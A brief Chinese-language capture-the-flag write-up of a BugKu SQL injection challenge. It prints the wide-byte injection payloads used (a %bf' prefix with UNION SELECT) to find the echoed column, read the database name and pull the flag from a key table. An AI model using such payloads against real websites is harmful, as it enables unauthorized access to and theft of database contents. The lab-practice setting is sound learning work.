BugKu之sql注入
今天和大家分享一道BugKu中关于sql注入的题目,在web题中,sql注入的相关知识可以说随处可见了,在这里咱们就就题论题不做其他的拓展和延伸了。
拿到题以后,还是老套路,and 1=1和and 1=2 看看是否带入查询,但是这个题目在?id=1和?id=1'两种条件下都不报错,查看页面源代码发现gb2312于是尝试宽字节注入。?id=1%bf' union select 1,2%23 来确定回显,
?id=1%bf' union select 1,database()%23查询数据库名称为sql5,
?id=1%bf' union select 1,string from sql5.key%23 然后查询key表,id=1的string字段。
得到flag,sql注入中的宽字节注入以及绕过等方面的问题可以说是难者不会,会者不难了,只要平时多学多练,这类题就会成为你的送分题。